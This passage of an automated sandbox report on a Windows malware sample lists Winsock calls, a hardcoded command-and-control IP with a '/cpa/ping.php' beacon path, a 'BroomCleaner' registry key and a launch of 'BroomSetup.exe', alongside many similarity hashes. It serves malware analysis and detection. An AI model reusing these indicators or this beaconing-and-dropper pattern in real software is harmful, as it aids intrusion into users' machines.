• connect.WS2_32(00000000,?,00000010), ref: 0042721C
• send.WS2_32(00000000,00000000,00000000,00000000), ref: 0042723F
• send.WS2_32(00000000,00000000,?,00000000), ref: 0042725B
• recv.WS2_32(00000000,00000000,00000001,00000000), ref: 0042729B
• recv.WS2_32(?,00000000,00000001,00000000), ref: 00427419
• recv.WS2_32(?,?,00000000,00000000), ref: 004274B8
• recv.WS2_32(?,0000000A,00000002,00000000), ref: 004274DF
• recv.WS2_32(00000000,?,?,00000000), ref: 00427540
• WSACleanup.WS2_32 ref: 0042757E
• closesocket.WS2_32(?), ref: 00427585
Strings
Memory Dump Source
• Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Similarity
• API ID: recv$Cleanupsend$H_prologStartupclosesocketconnectgethostbynamehtonssocket
• String ID: HTTP/1.1$185.172.128.90$Content-Length$GET $HTTP/1.1 200 OK$Host: $Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 $POST $Transfer-Encoding$User-Agent: $chunked
• API String ID: 791229064-3676584321
• Opcode ID: 7bc742ea917e032f14d27c255483df2a22af7a2c11a4f1ddb339e58efc080f3d
• Instruction ID: 5d172c2dbe9bbe0c33395fe13eab479c6144de839071dc58773496d8017457fc
• Opcode Fuzzy Hash: 7bc742ea917e032f14d27c255483df2a22af7a2c11a4f1ddb339e58efc080f3d
• Instruction Fuzzy Hash: F092661090A2A19ACB02FFB5689649E7FF55A1630DB14747FE5907F3D3CA2C8209C76E
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetCurrentProcess.KERNEL32(00000003,?,004139BD,00000003,00439450,0000000C,00413B14,00000003,00000002,00000000,?,00412B6B,00000003), ref: 00413A08
• TerminateProcess.KERNEL32(00000000,?,004139BD,00000003,00439450,0000000C,00413B14,00000003,00000002,00000000,?,00412B6B,00000003), ref: 00413A0F
• ExitProcess.KERNEL32 ref: 00413A21
Memory Dump Source
• Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 41e8ad208a3876fc19484f537d8192bb69e165b4f10d4b201afb92c4f14ee63d
• Instruction ID: 5487a5d46cc6b628b64d0aabb319d5eb223523a794a7473b7ec3082598feaf8f
• Opcode Fuzzy Hash: 41e8ad208a3876fc19484f537d8192bb69e165b4f10d4b201afb92c4f14ee63d
• Instruction Fuzzy Hash: E2E04F31101504ABCF116F14DD08A9A3B29FF04386F454029F84656131CF39DE83CA48
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 040CCCFE
• Module32First.KERNEL32(00000000,00000224), ref: 040CCD1E
Memory Dump Source
• Source File: 00000004.00000002.2259248364.00000000040CC000.00000040.00000020.00020000.00000000.sdmp, Offset: 040CC000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_40cc000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Yara matches
Similarity
• API ID: CreateFirstModule32SnapshotToolhelp32
• String ID:
• API String ID: 3833638111-0
• Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
• Instruction ID: 9d19e0bb7558537807994e931cf64508a97659187c15565e8aeb969a0dd86e75
• Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
• Instruction Fuzzy Hash: ACF06231500715ABF7203BF9E88CA6E76E9EF49665F14052CF64BF20C0DA70F8468661
Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: aa56684864c8632bf99b39259769552b117b79340854f3fab038ab321572be05
• Instruction ID: cb3ffe6ea045fbb478305932556cdcbc34478d372374edfe54fef2084c460810
• Opcode Fuzzy Hash: aa56684864c8632bf99b39259769552b117b79340854f3fab038ab321572be05
• Instruction Fuzzy Hash: 3421B072C012049BDB41AFAAC8117DD37A06F16334F11068BE864AB2E2C7BC9D918B6D
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (graph rendering not reproduced; legend: Executed / Not Executed)

APIs
• Part of subcall function 0041A039: CreateFileW.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0041A056
• GetLastError.KERNEL32 ref: 0041A47F
• __dosmaperr.LIBCMT ref: 0041A486
• GetFileType.KERNEL32(00000000), ref: 0041A492
• GetLastError.KERNEL32 ref: 0041A49C
• __dosmaperr.LIBCMT ref: 0041A4A5
• CloseHandle.KERNEL32(00000000), ref: 0041A4C5
• CloseHandle.KERNEL32(?), ref: 0041A60F
• GetLastError.KERNEL32 ref: 0041A641
• __dosmaperr.LIBCMT ref: 0041A648
Strings
Memory Dump Source
• Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Similarity
• API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
• String ID: H
• API String ID: 4237864984-2852464175
• Opcode ID: 0df5222a233c6114ee027709094600eef7ff1df3394e17eab98b892044d57319
• Instruction ID: 1a6929838056931ddf07ca16ed76f5c23edfa2113b557bae9411180e0ac2dad7
• Opcode Fuzzy Hash: 0df5222a233c6114ee027709094600eef7ff1df3394e17eab98b892044d57319
• Instruction Fuzzy Hash: DAA13632A041188FDF19DF68D8517EE7BA1AF06324F14015EEC51EB391DB398DA2CB5A
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (graph rendering not reproduced; legend: Executed / Not Executed)

Memory Dump Source
• Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 997ea1e074bed25bc4bbba2399cba16e5922d8a4b1bc8de6d13cd7412f5484b7
• Instruction ID: 1de375e9a44cfea9a4e980cda881e291b4907b82d4d6a27c77cd479f01cc8893
• Opcode Fuzzy Hash: 997ea1e074bed25bc4bbba2399cba16e5922d8a4b1bc8de6d13cd7412f5484b7
• Instruction Fuzzy Hash: BCC12B71E04249AFDB11CFA9C851BEE7BB1BF19314F04019AE854B7392C7789D81CB69
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (graph rendering not reproduced; legend: Executed / Not Executed)

APIs
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 05BD024D
Strings
Memory Dump Source
• Source File: 00000004.00000002.2279821604.0000000005BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_5bd0000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID: cess$kernel32.dll
• API String ID: 4275171209-1230238691
• Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
• Instruction ID: 3dcfaa7b78ad33e72f642000e24d0c8bec40ef6446ea0992723490af3af8ea7d
• Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
• Instruction Fuzzy Hash: A4526D74A01229DFDB64DF58C984BACBBB1BF09314F1480D9E54DAB351EB30AA85CF24
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (graph rendering not reproduced; legend: Executed / Not Executed)

APIs
• __EH_prolog.LIBCMT ref: 00426134
• RegCreateKeyExA.KERNEL32(80000001,SOFTWARE\BroomCleaner,00000000,00000000,00000000,000F003F,00000000,?,00000000,Installed,0043CE50,SOFTWARE\BroomCleaner), ref: 0042615C
• RegSetValueExA.KERNEL32(?,?,00000000,00000001,?,?,0043CE50,0043CE51,Installed,Installed), ref: 004261DF
• RegCloseKey.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 00426200
Strings
Memory Dump Source
• Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseCreateH_prologValue
                                                                                                                                                                                                                                  • String ID: Installed$SOFTWARE\BroomCleaner
                                                                                                                                                                                                                                  • API String ID: 1996196666-529226407
                                                                                                                                                                                                                                  • Opcode ID: 3ebed42bd8a8a97b6f395c5c0a06025ece7bda2f9691e063b130d2fba8ebffaa
                                                                                                                                                                                                                                  • Instruction ID: 58fc235232bf4dd8c125a8bac87f810df134f3da6f2bb4c7cb0ac5f6772b16af
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3ebed42bd8a8a97b6f395c5c0a06025ece7bda2f9691e063b130d2fba8ebffaa
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 47319A71A00229AFDF149FA8DC949FEBB79FB48358F44412EE802B7291C7B55E05CB64
                                                                                                                                                                                                                                  Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 1648 426260-42626f 1649 426271-426277 1648->1649 1649->1649 1650 426279-4262ac ShellExecuteExA 1649->1650 1651 4262c5-4262d1 call 402bef 1650->1651 1652 4262ae-4262bf WaitForSingleObject CloseHandle 1650->1652 1652->1651
APIs
• ShellExecuteExA.SHELL32(?,/BroomSetup.exe), ref: 004262A2
• WaitForSingleObject.KERNEL32(?,00008000), ref: 004262B6
• CloseHandle.KERNEL32(?), ref: 004262BF
Strings
Memory Dump Source
• Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Similarity
• API ID: CloseExecuteHandleObjectShellSingleWait
• String ID: /BroomSetup.exe
• API String ID: 3837156514-1897133622
• Opcode ID: db3e73961b18c1c10bd7b6012b861b807e274889a1b3163fb6465ff1849ddad4
• Instruction ID: f0609d10c970eb56ece5b35627df0b7ec36997a903e398cb54ca8c4de5c5ad66
• Opcode Fuzzy Hash: db3e73961b18c1c10bd7b6012b861b807e274889a1b3163fb6465ff1849ddad4
• Instruction Fuzzy Hash: 66017C31E00218EBDF25EF69E9459DDBBB8EF08310F41812AF805A6260EB709A45CF94
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 1655 4163fd-416411 call 41e97a 1658 416413-416415 1655->1658 1659 416417-41641f 1655->1659 1660 416465-416485 call 41e8e9 1658->1660 1661 416421-416428 1659->1661 1662 41642a-41642d 1659->1662 1671 416493 1660->1671 1672 416487-416491 call 41234b 1660->1672 1661->1662 1664 416435-416449 call 41e97a * 2 1661->1664 1665 41644b-41645b call 41e97a FindCloseChangeNotification 1662->1665 1666 41642f-416433 1662->1666 1664->1658 1664->1665 1665->1658 1674 41645d-416463 GetLastError 1665->1674 1666->1664 1666->1665 1676 416495-416498 1671->1676 1672->1676 1674->1660
APIs
• FindCloseChangeNotification.KERNEL32(00000000,00000000,?,?,0041631B,?,?,?,?,?,?,?,?,?,00427665,000000FF), ref: 00416453
• GetLastError.KERNEL32(?,0041631B,?,?,?,?,?,?,?,?,?,00427665,000000FF), ref: 0041645D
• __dosmaperr.LIBCMT ref: 00416488
Memory Dump Source
• Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Similarity
• API ID: ChangeCloseErrorFindLastNotification__dosmaperr
• String ID:
• API String ID: 490808831-0
• Opcode ID: 139c316f0d34cae01b774305b8ab889bfc55088184a7960cb4481621f44fdba6
• Instruction ID: aa9397e3c223395acf83e04721932d84fcb93a289d6ab5d19588dbc87750978f
• Opcode Fuzzy Hash: 139c316f0d34cae01b774305b8ab889bfc55088184a7960cb4481621f44fdba6
• Instruction Fuzzy Hash: 4F016B33A101201AD6355675A8457FF2B494B82B38F27016FFC18972D1DF6CDCC6469D
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 1680 419767-41977f call 41e97a 1683 419781-419786 call 412381 1680->1683 1684 419792-4197a8 SetFilePointerEx 1680->1684 1690 41978c-419790 1683->1690 1685 4197b9-4197c3 1684->1685 1686 4197aa-4197b7 GetLastError call 41234b 1684->1686 1689 4197c5-4197da 1685->1689 1685->1690 1686->1690 1692 4197df-4197e4 1689->1692 1690->1692
APIs
• SetFilePointerEx.KERNEL32(00000000,?,00000002,?,00000000,?,?,?,?,?,00419816,?,?,00000002,00000000), ref: 004197A0
• GetLastError.KERNEL32(?,00419816,?,?,00000002,00000000,?,00416146,?,00000000,00000000,00000002,?,?,?,?), ref: 004197AA
• __dosmaperr.LIBCMT ref: 004197B1
Memory Dump Source
• Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Similarity
• API ID: ErrorFileLastPointer__dosmaperr
• String ID:
• API String ID: 2336955059-0
• Opcode ID: 6955d807685c1ca33d0ae090671f376d44056e1be3e06fc28f14aab88d4da9d5
• Instruction ID: aba61adf325f610bb64cc2fd6d97dc3a8945be917003060b225fa659b6e0b810
• Opcode Fuzzy Hash: 6955d807685c1ca33d0ae090671f376d44056e1be3e06fc28f14aab88d4da9d5
• Instruction Fuzzy Hash: 8E012D37B20119ABCB159F99DC059EE7B19DF85330B28024EFC21972D0EA749C918798
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 1694 426217-42623c CreateFileA 1695 426259-42625f 1694->1695 1696 42623e-426253 WriteFile FindCloseChangeNotification 1694->1696 1696->1695
APIs
• CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000,?,00002000,00000000,?,?,0042588E,00000001,?,00002000), ref: 00426232
• WriteFile.KERNEL32(00000000,?,?,00002000,00000000,?,0042588E,00000001,?,00002000,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 0042624A
• FindCloseChangeNotification.KERNEL32(00000000,?,0042588E,00000001,?,00002000,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 00426253
Memory Dump Source
• Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Similarity
• API ID: File$ChangeCloseCreateFindNotificationWrite
• String ID:
• API String ID: 3805958096-0
• Opcode ID: ea6e1008648175cfb482bb30eeb8851ccd6d366c881e9156fb96c3698a6c4966
• Instruction ID: 926e9ac1e5f1aba45008a0d26bda579428ca80e0843417663d772dc166ed892d
• Opcode Fuzzy Hash: ea6e1008648175cfb482bb30eeb8851ccd6d366c881e9156fb96c3698a6c4966
• Instruction Fuzzy Hash: 73E06572701120BBD7351B99AC48FABBE6DEF856F0F050169FB01E21109A61DC0197B4
Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

Control-flow Graph (image): entry block 401bb2-401c21, calls 4275a4, 40307c, 402fe5, 402f6b; block 401c49-401c4c calls 40187f
APIs
• __EH_prolog.LIBCMT ref: 00401BB7
  • Part of subcall function 0040307C: __EH_prolog.LIBCMT ref: 00403081
  • Part of subcall function 00402FE5: __EH_prolog.LIBCMT ref: 00402FEA
  • Part of subcall function 00402FE5: std::locale::_Init.LIBCPMT ref: 0040300E
  • Part of subcall function 00402F6B: __EH_prolog.LIBCMT ref: 00402F70
  • Part of subcall function 0040187F: __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
  • Part of subcall function 0040187F: std::system_error::system_error.LIBCPMT ref: 004018D8
Memory Dump Source
• Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Similarity
• API ID: H_prolog$Exception@8InitThrowstd::locale::_std::system_error::system_error
• String ID: v*@
• API String ID: 3966877926-3062513736
• Opcode ID: 75af08b354eb886bb40f1edcec266cde64058157f3a774df709a09292bb85848
• Instruction ID: b9e6d0c04dc114dbe46ca1cb3692bd7dbb1da951860286197dc681cf7a8c4379
• Opcode Fuzzy Hash: 75af08b354eb886bb40f1edcec266cde64058157f3a774df709a09292bb85848
• Instruction Fuzzy Hash: E82190B1711206AFD708DF59C889A6AF7F9FF48348F14826EE115A7341C7B8DE008B94
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 00425EE7
  • Part of subcall function 00401BB2: __EH_prolog.LIBCMT ref: 00401BB7
  • Part of subcall function 00402403: __EH_prolog.LIBCMT ref: 00402408
• std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00425FC9
Memory Dump Source
• Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Similarity
• API ID: H_prolog$Ios_base_dtorstd::ios_base::_
• String ID:
• API String ID: 420165198-0
• Opcode ID: b93ceea2ca49065fabeb8f5add2c04d8e46cbf417997cc66e17ce7118fc6a16a
• Instruction ID: 8b308e217030a11e536693c7e770bb36c60ea871e1947f1e620e0115d8c257f2
• Opcode Fuzzy Hash: b93ceea2ca49065fabeb8f5add2c04d8e46cbf417997cc66e17ce7118fc6a16a
• Instruction Fuzzy Hash: 3B311570D01119EBDB14EF95E985AEDFBB4BF48304F1080AEE805B3681EB786A04CB64
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (image): entry block 5bd0e0f-5bd0e24, SetErrorMode called twice
APIs
• SetErrorMode.KERNEL32(00000400,?,?,05BD0223,?,?), ref: 05BD0E19
• SetErrorMode.KERNEL32(00000000,?,?,05BD0223,?,?), ref: 05BD0E1E
Memory Dump Source
• Source File: 00000004.00000002.2279821604.0000000005BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_5bd0000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
• Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
• Instruction ID: c1a164af8fd5c49b83710f357783f833f707ad06cda1ddffafae78d704cf732b
• Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
• Instruction Fuzzy Hash: 24D0123154512C77D7003B94DC0DBCDBB1CDF09B62F008051FB0DD9080D770954046E5
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2ae4b7848d5fc5729d99f5a7e27ee10caa38967bc1771efee0ecf6ad26560584
• Instruction ID: d77f3fb4a2dea80d7e26f58f35abdac3f7963be9eaf0666b1d936bf3e200b83d
• Opcode Fuzzy Hash: 2ae4b7848d5fc5729d99f5a7e27ee10caa38967bc1771efee0ecf6ad26560584
• Instruction Fuzzy Hash: 11510771A00108AFDB10DF29C840BFA7BA1EF85364F19815EE8489B392CB39DD82C759
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Similarity
• API ID: __fread_nolock
• String ID:
• API String ID: 2638373210-0
• Opcode ID: 25aeabf7499e8ad583be7248ba51f421055d1c52451b24307ef19921f3e1bf67
• Instruction ID: 0bde1253143090ae73d8540e9fd285f072e0ff93183f3a7406587cf81db67a05
• Opcode Fuzzy Hash: 25aeabf7499e8ad583be7248ba51f421055d1c52451b24307ef19921f3e1bf67
• Instruction Fuzzy Hash: CF316B31604706AFC710DE29C884A5ABBA0BF88354F04863EF954A73A1D779D854CB9A
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 004024A6
  • Part of subcall function 0040187F: __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
  • Part of subcall function 0040187F: std::system_error::system_error.LIBCPMT ref: 004018D8
Memory Dump Source
• Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Similarity
• API ID: Exception@8H_prologThrowstd::system_error::system_error
• String ID:
• API String ID: 938716162-0
• Opcode ID: 1152c10f0f73a98428df0f9104ae7712f9923eb88e3ed4c89856aabc2728c85f
• Instruction ID: 51a424f7f6e89c6a531f911fc24cb136489b0386115aa572e9e255c0d5409117
• Opcode Fuzzy Hash: 1152c10f0f73a98428df0f9104ae7712f9923eb88e3ed4c89856aabc2728c85f
• Instruction Fuzzy Hash: B9318B71A00505AFCB18DF69C9D5E6AB7F5FF84318718C16EE416AB791C634EC40CB54
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 00402581
  • Part of subcall function 00402B06: __EH_prolog.LIBCMT ref: 00402B0B
Memory Dump Source
• Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: 2c318ff338f7a8eac22c397537d2360df678c12f2412966b479c09de5dfc03e1
• Instruction ID: 5794e906f2440793f0f111a630642e31dc7bb6ced8b38f44c89e924cf631a0c7
• Opcode Fuzzy Hash: 2c318ff338f7a8eac22c397537d2360df678c12f2412966b479c09de5dfc03e1
• Instruction Fuzzy Hash: 87318770A00615AFCB15DF09CA84A9ABBB1FF48314F14856EE405AB791C7B9ED40CB94
Uniqueness
• Uniqueness Score: -1.00%
APIs
• __EH_prolog.LIBCMT ref: 00402408
  • Part of subcall function 00402B06: __EH_prolog.LIBCMT ref: 00402B0B
Memory Dump Source
• Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: 8ed48e9fba55e0418c031890955b2c9948e55e9159a839dee9493f5c858f8f4c
• Instruction ID: 4e0495d31301cfc09fe992fc8428b3d42591f74c8e771436201b91ad316d0700
• Opcode Fuzzy Hash: 8ed48e9fba55e0418c031890955b2c9948e55e9159a839dee9493f5c858f8f4c
• Instruction Fuzzy Hash: 9D217C70601611DFC728DF19C54896ABBF5FF88314B20C26DE85A9B7A1C774AE41CB90
Uniqueness
• Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Similarity
• API ID: __wsopen_s
• String ID:
• API String ID: 3347428461-0
• Opcode ID: 9d91d9df30251d2d82c78a357851f1850054374a36094e401c27366056efc238
• Instruction ID: 62b4485d732ad4ebc0017ff3881fb56af0f069673ee8f9cf524c42d6b5156d4d
• Opcode Fuzzy Hash: 9d91d9df30251d2d82c78a357851f1850054374a36094e401c27366056efc238
• Instruction Fuzzy Hash: 6911367590410AAFCB05DF98E9419EB7BF4EF48314F0040AAF819AB311D631E9618BA9
Uniqueness
• Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6507e6dca9fd37c1152104383e81a26a388e7b6248357c92fed83c7c77d0c48c
• Instruction ID: bb13e13d757cd37dfe0a4f239b5d8845d05e4a8eb61872b1cde1787caac163ea
• Opcode Fuzzy Hash: 6507e6dca9fd37c1152104383e81a26a388e7b6248357c92fed83c7c77d0c48c
• Instruction Fuzzy Hash: E4F0F93254061496D6213A6B9C0579B32AC9F92339F114BBFFC30A61C2CA7CE95246AE
Uniqueness
• Uniqueness Score: -1.00%
APIs
• __EH_prolog.LIBCMT ref: 00402F70
  • Part of subcall function 004035F5: __EH_prolog.LIBCMT ref: 004035FA
  • Part of subcall function 004035F5: std::_Lockit::_Lockit.LIBCPMT ref: 00403609
  • Part of subcall function 004035F5: int.LIBCPMT ref: 00403620
  • Part of subcall function 004035F5: std::locale::_Getfacet.LIBCPMT ref: 00403629
  • Part of subcall function 004035F5: std::_Lockit::~_Lockit.LIBCPMT ref: 00403670
Memory Dump Source
• Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
Similarity
• API ID: H_prologLockitstd::_$GetfacetLockit::_Lockit::~_std::locale::_
• String ID:
• API String ID: 3585332825-0
• Opcode ID: 275b497e8b0ccd48a1c91312fae6d11bbe173a5bd3edbee57c471b6d182478c8
• Instruction ID: 4123f54f6db546b52d5441bf0cc69889d4086bdab9222fcc4d2dc13d92cadc12
• Opcode Fuzzy Hash: 275b497e8b0ccd48a1c91312fae6d11bbe173a5bd3edbee57c471b6d182478c8
